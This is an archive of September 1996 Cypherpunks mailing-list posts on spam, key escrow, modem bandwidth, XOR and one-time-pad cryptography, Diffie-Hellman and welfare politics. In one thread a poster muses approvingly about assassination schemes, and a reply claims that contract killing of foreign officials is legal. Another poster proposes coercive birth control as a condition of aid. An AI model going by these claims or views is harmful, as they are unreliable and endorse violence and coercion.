highest protection from governmental intrusion. ... Just as the strength of the Internet is chaos, so the strength of our liberty depends upon the chaos and cacophony of the unfettered speech the First Amendment protects." -- Judge Stewart Dalzell Unsolicited advertising/promotional email proofread for $500/message! Your sending such a message to me is an explicit request for my services! From roy at sendai.scytale.com Tue Sep 17 01:15:03 1996 From: roy at sendai.scytale.com (Roy M. Silvernail) Date: Tue, 17 Sep 1996 16:15:03 +0800 Subject: Spam blacklist project In-Reply-To: <9609162025.AA00550@etna.ai.mit.edu> Message-ID: <960916.231154.4N4.rnr.w165w@sendai.scytale.com> -----BEGIN PGP SIGNED MESSAGE----- In list.cypherpunks, hallam at ai.mit.edu writes: [ a 'don't call' list of email addresses suggested ] > Of course I don't for a moment imagine that this will > be 100% effective. I think the figure you're looking for is closer to 0% than 100% > Without government regulation there will > always be slimeballs who send mail to people who don't want it. If you remove the first three words of that sentence, I agree 100%. If you replace the first word with "With", I also agree 100%. Regulations aren't the answer. Slimeballs don't care if there are rules. Furthermore, regulations for spam mean enforcement procedures. Looks like GAE is the only way to do it. Howzabout you can only send mail through a USPS gateway? Wouldn't that make it easy? {for the acronym-impaired, the E stands for email. the sarcasm-impaired probably already hit delete} > The advantage of this scheme is that it would mean that > the spam industry can avoid regulation pressure and they can > deflect criticism. Meanwhile recipients of unwanted spam have > a legitimate beef. You're asking marketing concerns to proactively limit their coverage in the absence of legislation or regulation. History suggests it would be less than completely effective. - -- Roy M. Silvernail [ ] roy at scytale.com PGP Public Key fingerprint = 31 86 EC B9 DB 76 A7 54 13 0B 6A 6B CC 09 18 B6 Key available from pubkey at scytale.com -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMj4n0Bvikii9febJAQGfEgQApg8urK9TpWxfggZTRNdvvHY0rYptrJyV zvcRjgcgQsB2aca2TekXNtiG/h6blfey46sdVTX2bpZFoC8nnSDn8fVikiG7epwo xuR5Zr5mGQiUwr+hMWxGIHf79BMuRAwahFQRXTroPK8Wo82nrVKamuK0qoXm+c++ kGugOkYMtHc= =dIo2 -----END PGP SIGNATURE----- From unicorn at schloss.li Tue Sep 17 01:18:19 1996 From: unicorn at schloss.li (Black Unicorn) Date: Tue, 17 Sep 1996 16:18:19 +0800 Subject: IBM_gak In-Reply-To: Message-ID: On Mon, 16 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > Lucky Green writes: > > Aparently, Al Gore's recent phone calls to everybody who is anybody in the > > industry have paid off. After HP, TIS, and other unnamed parties, now IBM > > is supporting GAK. Folks, this battle is lost. Domestic GAK is coming to > > a PKI near you. > > Apparently, senile Tim May (fart) is a Clinton administration troll planted > here to sabotage any discussions of actual crypto work and to flood this > mailing list with lies and personal attacks and to make it unusable. If so, it would seem you fell for it and failed to resist the temptation to type the word "fart" out- yet again. > > --- > > Dr.Dimitri Vulis KOTM > Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps > -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From azur at netcom.com Tue Sep 17 01:28:11 1996 From: azur at netcom.com (Steve Schear) Date: Tue, 17 Sep 1996 16:28:11 +0800 Subject: 56 kbps modems Message-ID: >>> People who seemed to know used to say that 'the Shannon limit' >>> set an absolute upper limit around 40 kbps. Has Shannon been >>> proven wrong, or what? >>Well, it all depends on the signal-to-noise ratio. Also, if the noise is >>not white gaussian the situation can be even better. > >Or it can be worse. Almost all voice traffic in the US these days, >either once it gets to your local telephone wire center or maybe before, >is carried on T1 digital connections, which use 64kbps digital voice - >it's sampled at 8000 samples/second, A/D converted using a non-linear >8-bit scale called mu-law (or A-law for Europe), and (for the most common >framing format) has a signalling channel stego'd onto the LSB of every 6th >byte. >If you knew which the "robbed bit" was, you could get 63 kbps of digital data, >but since you don't, digital signals are limited to 56kbps since they >can't trust any of the low bits (analog doesn't lose much from this.) > Couldn't you just 'assume' you knew which bit was 'robbed' and test to see the result? If you were wrong, couldn't you advance/retard your clocking and via a process of elimination sync with the 'robbed bit? --Steve PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 --------------------------------------------------------------------- Snoop Daty Data | Internet: azur at netcom.com Grinder | Voice: 1-702-655-2877 Sacred Cow Meat Co. | Fax: 1-702-658-2673 7075 W. Gowan Road, #2148 | Las Vegas, NV 89129 | --------------------------------------------------------------------- Just say NO to perscription DRUGS. From unicorn at schloss.li Tue Sep 17 01:31:35 1996 From: unicorn at schloss.li (Black Unicorn) Date: Tue, 17 Sep 1996 16:31:35 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: <199609162254.PAA05380@joseph.cs.berkeley.edu> Message-ID: On Mon, 16 Sep 1996, David Wagner wrote: > In article , > Lucky Green wrote: > > On Sun, 15 Sep 1996, Dale Thorn wrote: > > > Just a comment: "The world population really should go back to around > > > one billion", etc. And how could we achieve that without severe govt. > > > oppression, one wonders? > > > > Quite simple. End all food and medical aid to developing countries paid > > for with money stolen at gunpoint from our citizens. Or make Norplant > > implants the condition for financial/in kind aid. Both US and > > abroad. > > Why stop there? > > Make biometric ID implants the condition for welfare and financial aid, so > we can track them in case they spend it on (gasp!) donations to the Libertarian > party. > > Government scholarships for education and research? Better wiretap their > phones & emails, in case the recipients use the scholarships to work on strong > non-GAKed cryptography. What, pray tell, does the above have to do with Mr. Green's point? > > Hell, folks are also taking advantage of government money every time they > step foot on a park or government road: might as well require citizen-units > to escrow their identity and confiscate their guns as a condition of usage. > And this? Mr. Green hardly advocated an authortarian regime, quite the contrary, he simply advocated one which refused to hand out money to every outstretched hand. > ``Buckle your thought-escrow-unit, it's the law!'' -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From shamrock at netcom.com Tue Sep 17 01:50:11 1996 From: shamrock at netcom.com (Lucky Green) Date: Tue, 17 Sep 1996 16:50:11 +0800 Subject: The GAK Momentum is Building... In-Reply-To: Message-ID: On Mon, 16 Sep 1996, Timothy C. May wrote: > > -- the "Clipper IV" (or is it only Clipper III?) GAK announcement expected > "soon" Its Clipper IV. It will take the form of a bill introduced by the USG later this Fall. > It seems that several of these announcements are happening at the same > time, which I doubt is coincidental. Nothing coincidental about it. The USG, through its front man Al Gore, has used time honored "divide and conquer" techniques to get the industry leaders to support their fascist agenda by promising to let them off easy under the future rules. For crying out loud, CyberCash, to give one example, touts in all their recent presentations how they have compliance with regulations that don't even exist yet built into their system. Meanwhile, HP, TIS, IBM, and others have made a deal to sell their children's birthright for fast track single DES export. I read some five newspaper articles on export control/GAK in the last few days. All mentioned as a matter of fact that GAK will be part of lightened export controls. None questioned the connection between domestic GAK and foreign exports. The worst of these articles, in the Sunday SF Chronicle, mentioned as the only defenders of non-GAK encryption hackers by the name of "Black Knight", etc. who were quoted as having no explanation for the dichotomy between "information wants to be free" and "I don't want the Feds to read my email". It is a done deal, --Lucky, who told you this three years ago. From bdurham at metronet.com Tue Sep 17 01:56:29 1996 From: bdurham at metronet.com (Brian Durham) Date: Tue, 17 Sep 1996 16:56:29 +0800 Subject: Redundancy in XOR encryption In-Reply-To: <842896374.27768.0@fatmans.demon.co.uk> Message-ID: <323E2C6A.7423@metronet.com> paul at fatmans.demon.co.uk wrote: > > -----BEGIN PGP SIGNED MESSAGE----- > > I have a question I hope someone here might be able to answer: > > As the method of cryptanalysis of XOR (Ie. index of coincidence) > relies on redundancy in the plaintext, would the following be strong: > > Compress P to get perfect compression (ie. 0 redundancy) > Encrypt F (the compressed text) using a repeated key XOR > > of course this is all rather theoretical as there is no such thing as > perfect compression, but I just thought it might be interesting to > see if this is indeed strong, superficially it appears so to me... > Paul: I think that if the cryptanalyst knows that F has zero redundancy that he can run searches from 0 to n bits for the key and have the computer flag solutions that have zero redundancy. I also think that a perfectly compressed file would have a relative entropy value close to one also, hence the computer could flag possibles that have both characteristics. Hence, instead of searching for plaintext by counting coincidences, we are searching the decrypts for solutions that have zero redundancy and a relative entropy value close to one. How many solutions will have both these qualities? I don't know. But if the compression method is known, brute force will be tried, and only having to try to decompress (read) data that has the resultant characteristics of compressed information will speed things up by quite a bit. Others may disagree with my thought-experiment and my approach, but I think this is quite possible ... even to persons with limited computing resources. Brian Durham bdurham at metronet.com From hallam at ai.mit.edu Tue Sep 17 01:57:39 1996 From: hallam at ai.mit.edu (hallam at ai.mit.edu) Date: Tue, 17 Sep 1996 16:57:39 +0800 Subject: Spam blacklist project In-Reply-To: <199609170200.WAA13918@osceola.gate.net> Message-ID: <9609170603.AA03193@etna.ai.mit.edu> Well if some people find it amazing that there are people out there who agree with the 98.8% of people who did not vote Libertarian at the last election then so be it. It might have occurred to you but if an industry gets its act together and provides itself with a fig leaf it gets regulated a lot less than if it says "up yours we don't believe you have the right". If it wasn;t for knowing how inane peole are on the net I would think the Hi Spammer to be an agent provocateur. Sending spam with a gratuitous "you can't stop me" message attached is an invitation in itself. The terrorists helpgroup stuff at his site hardly helps his cause either. All in all he looks like a custom made provocation to show to some senator like Exon and get a crackpot bill passed PDQ. Are people sure the guy isn't a front being run by some disgruntled tele-marketing or junk mail house that feels it is in danger of loosing business? Phill From frantz at netcom.com Tue Sep 17 02:01:11 1996 From: frantz at netcom.com (Bill Frantz) Date: Tue, 17 Sep 1996 17:01:11 +0800 Subject: Gaining trust in OCO crypto code Message-ID: <199609170523.WAA20766@netcom8.netcom.com> I agree with Norm's points. At 6:59 PM 9/16/96 -0700, Norman Hardy wrote: >At 3:06 PM 9/12/96, Bill Frantz wrote: >.... >>(2) Key generation. There are published ways to encode an RSA secret key >>in the corresponding RSA public key. A key generation algorithm which only >>uses 32 bits of the random number would be hard to detect, but easy to >>break by one who knew its secret. You have to be able to examine in detail >>how keys are generated. > >Actually if you generate 100,000 RSA keys with the algorithm the birthday >effect says that >you will have some collisions. Of course even 100,000 key generations takes >a long time. This statement was not as clear as I wish I had been. The trap door in RSA key generation is sufficient to require careful examination of the source for any RSA key (unless you can take the out Norm suggests as): >If random number generation is specified not to be integral to RSA key >generation, then two or more untrusted programs, from mutually hostile >sources, can generate your RSA key if they yield the same output from the >same input. In paranoia situations I would rather trust my keyboard random >than an algorithm chosen by my enemy. When I started discussing using only 32 bits of the random number, I was thinking of random session keys such as PGP generates for its IDEA cypher. I agree you could detect a small number bits being used to generate these keys by a birthday attack. However, most systems make sure these keys are never revealed outside the system (to preserve the secrecy of the messages). It is not easy to do a birthday audit of e.g. PGP session keys. ------------------------------------------------------------------------- Bill Frantz | "Cave softly, cave safely, | Periwinkle -- Consulting (408)356-8506 | and cave with duct tape." | 16345 Englewood Ave. frantz at netcom.com | - Marianne Russo | Los Gatos, CA 95032, USA From tcmay at got.net Tue Sep 17 02:10:51 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 17 Sep 1996 17:10:51 +0800 Subject: Snake Oil FAQ 0.4 [comments appreciated] Message-ID: At 2:06 AM 9/17/96, The Deviant wrote: >Not to mention, the basic flaw of OTP.. if you have the only copy of the >key, and the key is non-repetitive, how do you send the key to another >person without being just as insecure as not encrypting it in the first >place... almost any OTP claims are gonna be snake oil. Not quite. Many cryptographic messages have a *time value*. The canonical example is "Attack at dawn." A one-time pad carried by a unit out onto the battlefield is eminently valuable for receiving such time-critical messages. Many other examples abound: embassies receiving instructions from the home country, travelling businessmen exchanging messages with the office, Air Force One receiving encrypted transmissions from NORAD, and so on. This is why OTPs are still in use by the military, embassies, etc. Granted, asymmetric key systems have various advantages, discussed here all the time, but to say almost any OTP claims are snake oil is untrue. (Many claims about OTPs _are_ of course snake oil, but usually in that they are not true OTPs in the Shannon sense.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From unicorn at schloss.li Tue Sep 17 02:15:56 1996 From: unicorn at schloss.li (Black Unicorn) Date: Tue, 17 Sep 1996 17:15:56 +0800 Subject: Risk v. Charity (was: RE: Workers Paradise. /Political rant). In-Reply-To: Message-ID: On Mon, 16 Sep 1996, Steve Schear wrote: > >On Mon, 16 Sep 1996 19:58:25 -0400, Black Unicorn wrote: > > > >Remember the original purpose of social security. A government fund which > >was self sustaining because it only gave out what was put in and gained by > >investment. > > Not quite. You'll remember that SS was pitched to the masses as such > during the Great Depression, but its true purpose was to allow older > workers to quickly retire and make room for the largely unemployed men in > their prime, family raising, years. It became this, yes, but the original concept (at least according to the legislative history) was as I represent above. > > > > >> A social safety net is simply a form of health and life > >> insurance. Statistical arbitrage if you will. > > > >Yes, but not for the reasons you would cite. Social safety nets prevent > >rioting by the lower classes, revolution and general civil disorder > >because they appease the masses. Indeed this is a form of health and life > >insureance for the middle and upper classes. > > No doubt. See my previous comment. [...] > >Spreading the risk, by itself, does NOT reduce cost. You must properly > >PRICE risk. > > > >This is the distinction between insurance and welfare. > > Right on! I forgot to mention that welfare and free health insurance plans do not SPREAD risk either. They concentrate the risk of the entitlement eligable population including those able to pay down onto the smaller group of only those who earn an income substantial enough to contribute. Those who can pay in are effectively burdening the risk of those who cannot as well as themselves, instead of just themselves. > PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 > --------------------------------------------------------------------- > Snoop Daty Data | Internet: azur at netcom.com > Grinder | Voice: 1-702-655-2877 > Sacred Cow Meat Co. | Fax: 1-702-658-2673 > 7075 W. Gowan Road, #2148 | > Las Vegas, NV 89129 | > --------------------------------------------------------------------- > > Just say NO to perscription DRUGS. > > > > -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From rp at rpini.com Tue Sep 17 02:27:37 1996 From: rp at rpini.com (Remo Pini) Date: Tue, 17 Sep 1996 17:27:37 +0800 Subject: 56 kbps modems Message-ID: <9609170612.AA21839@srzts100.alcatel.ch> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: cypherpunks at toad.com Date: Tue Sep 17 08:09:26 1996 > > > > On Mon, 16 Sep 1996, Jay Gairson wrote: > > > Speaking of ISDN, how many people, can afford to have a personal ISDN > > line in there house? And then afford to connect to something/someone > > else on a next to permanent basis monthly? > > No problem here. My ISDN bill is a small fraction of my regular phone > bill. > In Switzerland you pay 25 CHF/month for a normal phoneline and 50 CHF/month for an ISDN line (but you get two channels), so basically here it doesn't matter, which technologie you choose. (BTW, usage charge - by the seconds - is the same for both) :) Remo Pini - ------< fate favors the prepared mind >------ Remo Pini rp at rpini.com PGP: http://www.rpini.com/crypto/crypto.html - ----< words are what reality is made of >---- -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQEVAwUBMj5AlxFhy5sz+bTpAQF2KQgAgzAfEFb/NDW+J1Ub77CsOhCA578hiGFJ +0i2/yQApQFh4nztiAZoa2VeRlJV6TFcueF4wrGLmsZzw1j+jgo6SvW4ZRqZzfjC Ob+1wF2SKskEWKoRkAz/+u+RcEAGiQObgTu4VbM59LSYMfX/oba9OurwClhqhg0y /twMQ1BLUbFLqhZrruLO4rM1H2px+2FhWd6CP2jwEkiC/ghLPzGFPwcMoS1nSAfQ PGCVbajLaLJalD31FjFT1Z48sA+waBkdCISe8DTx2LQfKq+WK2A1CRyNOlNZUZdj ReaFBvciSTc8Eq01RmFZFOwoPvw7uxi8VpqE/xEBvq6v6UxrBF8xPQ== =BEhi -----END PGP SIGNATURE----- From Wyntermute at worldnet.att.net Tue Sep 17 02:37:55 1996 From: Wyntermute at worldnet.att.net (Justin Card) Date: Tue, 17 Sep 1996 17:37:55 +0800 Subject: Diffie Hellman - logs in Galois fields In-Reply-To: <842896368.27767.0@fatmans.demon.co.uk> Message-ID: <323CDB46.1632@worldnet.att.net> paul at fatmans.demon.co.uk wrote: > > Hi all, > > A question for the matematicians out there: > > I am looking at the Diffie Hellman public key exchange protocol and > am trying to find out why it is computationally hard to take logs in > a finite (Galois) field. > > My maths tutor has told me a bit about the construction of Galois > fields (If I`m correct the construction is Z mod N, N some integer, > then a transformation F(x) on the residue classes already in the > field) I know also the definition is that there are P**k elements, p > a prime. > > My questions are as follows: > > 1. How can a field be finite, as by definition it has to be closed > under addition, subtraction, multiplication and division???? (sorry > if this one is a bit of a no brainer, maybe the definition is > different but I can`t seem to see how) I'll have to let somebody else answer this one, since I am really not sure. > 2. Why is taking logs in a finite field computationally hard? - Me > and Alec (My maths tutor at college) guessed that it is because > exponentiation and logs are each others inverse functions, and > somehow this becomes a one way function in a finite field. As far as anybody knows, you're right, exponentiation is a one way function in a prime field. However, there are some things to be said. If you're using a fixed g and N, or repeat both for too many key exchanges, if anybody logged them, it becomes a more exciting target, since the hard part of the algorithms need be completed only once. Then taking separate logs with the same g and N is easy. > 3. Are the Galois fields used in Diffie Hellman specially constructed > in any way or are they just normal GF???? The field used in DH is just a standard Galois Field mod some large prime. -- Wyntermute From nobody at replay.com Tue Sep 17 02:44:38 1996 From: nobody at replay.com (Anonymous) Date: Tue, 17 Sep 1996 17:44:38 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: Message-ID: <199609170532.HAA03260@basement.replay.com> Black Unicorn wrote: > > > The thing about _traditional_ charity, of the religious or community sort, > > > was that it was not treated as an "entitlement," as something the > > > resentful masses could "demand" as part of their "human rights." > > > > There's no substantial difference between their resentful whining about > > their rights > > Such as the "right" to health insurance, the "right" to free checks for > sitting on one's chair, the "right" to be treated preferentially as > equally qualified non-minorities applying to the same job, the "right" to > housing, the "right" to free education, the "right" to be paid three times > what your labor is worth in the lowest bracket jobs. I wasn't surprised when Attilla flogged a cartoon liberal in responding to me, but I'm quite surprised you have. I didn't produce or defend a litany of "rights," I pointed out that Tim is resentful and whines. > > and your resentful whining about your rights > > The right to personal property. Malapropos. > Beginning to get the picture? I've had it all along. > All of the former were created in the last 60 years out of whole cloth > more as "revolution insurance" than anything else. They are rights > because someone said they were, not because they are well or logically > grounded. Absolutely. > > - except maybe that you whine more. > > I should hope he does. Why? From craigw at dg.ce.com.au Tue Sep 17 02:52:49 1996 From: craigw at dg.ce.com.au (craigw at dg.ce.com.au) Date: Tue, 17 Sep 1996 17:52:49 +0800 Subject: 56 kbps modems Message-ID: <199609170629.QAA10129@mac.ce.com.au> > Also note there's no mention of the hype-writer's old friend, > compression. But than if ypou are doing the compressed rate 56k is not that high. There are 28.8k modems that (in theory) do 336k including compression, so 56k would be redundant. Most current modems specify they will compress to 115k, whether they ever get close to this is unlikely Craig ,'~``. \|/ ,'``~. (-o=o-) (@ @) ,(-o=o-), +--.oooO--(_)--Ooo-----oOO-(_)-OOo-------oooO--(_)--Oooo.------+ | | | Soon, we may all be staring at our computers, wondering | | whether they're staring back. | | | | [Network Admin For WPA Business Products. aka doshai >;-) ] | | .oooO http://pip.com.au/~doshai/ Oooo. | | ( ) Oooo. .oooO ( ) | +-----\ (----( )-------oooO-Oooo--------( )--- ) /---------+ \_) ) / \ ( (_/ (_/ \_) Key fingerprint = 2D F4 54 BB B4 EA F1 E7 B6 DE 48 92 FC 8D FF 49 Send a message with the subject "send pgp-key" for a copy of my key. (if I want to give it to you) From rp at rpini.com Tue Sep 17 02:54:20 1996 From: rp at rpini.com (Remo Pini) Date: Tue, 17 Sep 1996 17:54:20 +0800 Subject: 56 kbps modems Message-ID: <9609170622.AA22206@srzts100.alcatel.ch> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: erp at digiforest.com, cypherpunks at toad.com Date: Tue Sep 17 08:20:07 1996 Argh, criticism!!!!! :-0 > > 3. NO transmission over a standard phoneline can have more than 3100 > > baud, because the frequency of anything transmitted over that line is > > band limited to 300hz - 3400hz. (If you have ISDN it's not relevant > > anyway, since you are fixed with 8000hz or 64000 bps->in europe :), > > 56000 bps in usa) > > Personally, by saying that no transmission on a standard phoneline can > have more than 3100 baud, is a statement saying that technology and > science, shall never advance, to a point where things are possible. > If you remember right, just 10 or so years ago, we stated that 2400 baud > was the highest possible baud, and we would never go over. My modem, > running on a standard phone line, is a 28.8 USRobotics modem, with > the software, and hardware upgrades to a 3400 baud, I get on an average > day anywhere from 3500 to 3600 baud for send/receive. On a bad day, I > only get 3100 to 3200. SO I would say, that my phone lines, are cleaner > than most eh? And Yes, I am in the US. > Speaking of ISDN, how many people, can afford to have a personal ISDN > line in there house? And then afford to connect to something/someone > else on a next to permanent basis monthly? Well, if your modems says to "hell with the switch", you can do a lot of things with frequencies. And since the filters in the switch are not that accurate, you *might* get away with 3400 hz, which I doubt. Now if your phonecompany for what reason ever supports more bandwidth, thats good for you, but try to get your 3600 baud = 3600 hz modem to be accepted by the FCC will pose a problem, since it states in the regulations, that a modem has to stick to the 300-3400 hz band limits. > > 4. Most modern transmission schemes work with multiple bits per baud. > > I.e. you transmit 10 bits in one baud if you have a 31000 bps modem. > > the only limitation in transmission speed is the amount of binary > > values you can pack into one baud. that on the other hand is limited by > > the S/N (signal to noise) ratio of your line. If you have a noise of > > 0.9%, you can't use more than 100 steps or you have ambiguous signals. > > since people talk about 56000 bps modems (we tried 34000 modems here > > and they couldn't produce more than 28800 on a very good connection) > > that would mean, that you have to transmit 18 bits = 262144 (!) > > distinguishable signal forms per baud. > What about new ways of splitting the steps and baud more so that it > shows less at a higher level.... Just a question.. Ahh well, I'm > getting a page so I shall finish this now... Answer appreciated.. Huh? - ------< fate favors the prepared mind >------ Remo Pini rp at rpini.com PGP: http://www.rpini.com/crypto/crypto.html - ----< words are what reality is made of >---- -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQEVAwUBMj5DGBFhy5sz+bTpAQFQtwf/diE965nL6MCKX4ikXDyda9hq4a4yGQmV dxYHxD7ADCu32j+InC0FSCevO9Cjn5SoUhrHxsXHj/ZVaBEXRtJLX9g771FciBAz dqq1kKVVoFOJZGUCLUoHSD56tAU2t8pwXHu0QdnJWSpTLj9BausXGGcLH8PEJlAG 5bi3WP4M95Np/8nXUbR/GHlHiVLULRzDCgRLgVfDYe5NHgft69wXB5S3PoD/QUul ranoj1+4xk92M9SarPzcG8/gboR1EFVxgRdgLIi0zeyO+D0Ler648Btf6BgMdaSd Cr+9mzn/KXmrxHS4t6IPt+ZmZiUhzZHCcuxKrkb1JDz7pP6czhytyA== =0WaE -----END PGP SIGNATURE----- From unicorn at schloss.li Tue Sep 17 03:01:09 1996 From: unicorn at schloss.li (Black Unicorn) Date: Tue, 17 Sep 1996 18:01:09 +0800 Subject: Assassination Politics, was Kiddie porn on the Internet In-Reply-To: Message-ID: On Mon, 16 Sep 1996, Steve Schear wrote: > Someone wrote: > >The problem is that assasination rarely leads to the installation of > >a government that is any better. In most cases it gets worse. [...] > We've all heard these arguments, but are they true? Who says so, and how > can they be certain? Jim's suggestion has never, to my knowledge, been > tried on a consistant, large, scale. When all conventional alternatives > have been tried and fail, what have we or the starving children got to > lose? I think "Lord of the Flies" answers this question quite well. > Is it legal for citizens of the U.S. to engage in contract killing of > foreign military, politations, etc? How about U.S. or foreign non-profits? As to the first, yes. (There are several anti-mercenary statutes on the books) As to the second, I don't understand the question. [...] > -- Steve -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From tcmay at got.net Tue Sep 17 03:24:58 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 17 Sep 1996 18:24:58 +0800 Subject: Forwared message from Pres. of juno.com Message-ID: At 12:55 AM 9/17/96, Rabid Wombat wrote: >---------- Forwarded message ---------- >Date: Fri, 13 Sep 1996 15:25:58 -0400 >From: Charles Ardai >To: Rabid Wombat >Subject: Annoying spam incident(s) ^^^^ >> Complaints about spamming and cross-posting probably won't get you far, ^^^^^^^^ >A couple of clarifications: Juno has never sent a single piece of spam and, ^^^^ ... And so on, with the word "spam" being used frequently throughout the exchange. Now, correct me if I'm wrong, but I don't recall seeing _any_ "spam" from the account holders at Juno. What I _do_ recall is one or more young kids signed up to our list and then began engaging in posting to the list various boring comments about their interests, their "warez," and so on. Stupid comments are not necessarily (or even usually) spam. When we start calling stupid postings "spam" and complaining to sysadmins about "spamming" by a user, we have seriously devalued any use the term might have once had. This applies whether the stupid posts are from "talker" or from _me_. We have an open mailing list, with anyone able to subscribe via majordomo. This means we'll get inexperienced users, flamers, and, yes, even true commercial spammers who use the open-reflector nature of the list to post their ads. (By the way, when various political organizations, e.g., EPIC, the Libertarian Party, EFF, VTW, etc., use this open-posting feature, is this also to be called "spamming"? Why is an alert to dozens of mailing lists and newsgroups not spam, while "Buy Wheaties" _is_ spam? The answer is that spam is in the eye of the beholder, and the law should not attempt to decide which "unrequested messages" are OK and which are not.) Some suggestions: -- if people want a closed list, use a version of list software that only allows members to post -- if people want "levels" of expertise involved, a la "29th Level Cypherpunk," this is not the place and time to try to implement this -- use filters, e.g., procmail, Eudora, whatever -- don't refer to unwanted posts as "spam," as this invites talk of applying laws about spam -- as always, use technology and related tools (filters, reputations) whenever possible instead of laws and the threat of laws The sooner we move to a system where people make positive decisions about which messages to accept and which not to, the better. This is a technological effort--seeking to influence the direction mail takes--worthy of some serious thinking, in my view. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From stewarts at ix.netcom.com Tue Sep 17 04:14:26 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 17 Sep 1996 19:14:26 +0800 Subject: 56 kbps modems Message-ID: <199609170721.AAA22844@dfw-ix12.ix.netcom.com> >On Mon, 16 Sep 1996, Jay Gairson wrote: >> Speaking of ISDN, how many people, can afford to have a personal ISDN >> line in there house? And then afford to connect to something/someone >> else on a next to permanent basis monthly? It's Phone Company Dependent. Here in Pac Bell territory, an ISDN phone line costs about 2.5 analog phone lines, and gets you two phone lines plus some signalling. Connection costs are free at night, and 1 cent/minute daytime. That may change - the phone company is appalled that all these computer people interpret the phrase "free at night" as meaning "it's _free_ at night", so their holding time predictions were bogus :-) Night is defined as 7pm-7am for ISDN. ISDN-equipped ISPs start at about $30/month; don't know if that's unlimited connect time or not. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From stewarts at ix.netcom.com Tue Sep 17 04:36:27 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 17 Sep 1996 19:36:27 +0800 Subject: Snake Oil FAQ 0.4 [comments appreciated] Message-ID: <199609170722.AAA22919@dfw-ix12.ix.netcom.com> At 10:06 PM 9/16/96 -0400, The Deviant wrote: >Not to mention, the basic flaw of OTP.. if you have the only copy of the >key, and the key is non-repetitive, how do you send the key to another >person without being just as insecure as not encrypting it in the first >place... almost any OTP claims are gonna be snake oil. The way you send OTPs to people securely is to use couriers with briefcases handcuffed to their arms, or whatever level of physical security you need. The kinds of things software packages can help with are providing a friendly user interface for getting the next N bits out of the pad and trashing them after use, keeping track of where you were in the pad, handling the different pads you use to communicate with different people, driving the robot arm that drops the tape into the shredder, etc. Slightly less trustably, they can be used to help generate a pad by crunching down the data from your hardware random number generators, and perhaps emailing Geiger Counter data to the Safety Department after rounding to the nearest order of magnitude. Somebody else wrote: >> I would also suggest that the generation of OTP 'pads' for users is >> *highly* questionable. Who else is getting a copy of them, assuming they're >> even valid? Definitely - that concept loses big time. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From craigw at dg.ce.com.au Tue Sep 17 04:38:06 1996 From: craigw at dg.ce.com.au (craigw at dg.ce.com.au) Date: Tue, 17 Sep 1996 19:38:06 +0800 Subject: Risk v. Charity (was: RE: Workers Paradise. /Political rant Message-ID: <199609170703.RAA21552@mac.ce.com.au> Personally, I paid my way through uni...full fees. I took out a loan when I developed cancer to pay for it (as the health insurance was not finalised for aproval - so they got out of paying). The few months I was unemployed after I left the military because of a confict of interests I earned money by doing whatever I could get (even though I am an engineer I have worked in a petrol station). So why and for what reason sould I have to pay several 10's of thousands each year to support others. I have never taken help from the govenment, I do not feel I should have to pay as well. And what am I paying for...to protect the status quo. I believe that there is more than enough help for ppl available. They just need to get off their butts and work. > > tcmay at got.net (Timothy C. May) wrote: > > >"Saving for a rainy day," whether saving, investing, getting an education > > (while others are out partying), preparing, etc., all takes effort and > > commitment. If those who save and prepare are then told they have to pay > > high taxes to support those who partied....well, the predictable effect > > [...] is _more_ people in agony. When you tell people that a compassionate > > society will meet their basic needs, a predictable fraction of them will choose > > not to work hard and prepare themselves. > > > > Two questions, two observations: > > Do you have health insurance? > > Do you have life insurance? > > Yes, so? > Yes, so? Myself also yes,yes > > I have commented on your line of reasoning before and and it still > > seems to me that an important part of the discussion is missed. > > Specifically, that anyone can "save for a rainy day" and still not be > > able to provide for events that can always happen: Heart attack, stroke, > > car accident, pinched nerve that leaves you in excruciating pain and > > unable to work for several years. > > Understand what it is you are saying. > ,'~``. \|/ ,'``~. (-o=o-) (@ @) ,(-o=o-), +--.oooO--(_)--Ooo-----oOO-(_)-OOo-------oooO--(_)--Oooo.------+ | | | Soon, we may all be staring at our computers, wondering | | whether they're staring back. | | | | [Network Admin For WPA Business Products. aka doshai >;-) ] | | .oooO http://pip.com.au/~doshai/ Oooo. | | ( ) Oooo. .oooO ( ) | +-----\ (----( )-------oooO-Oooo--------( )--- ) 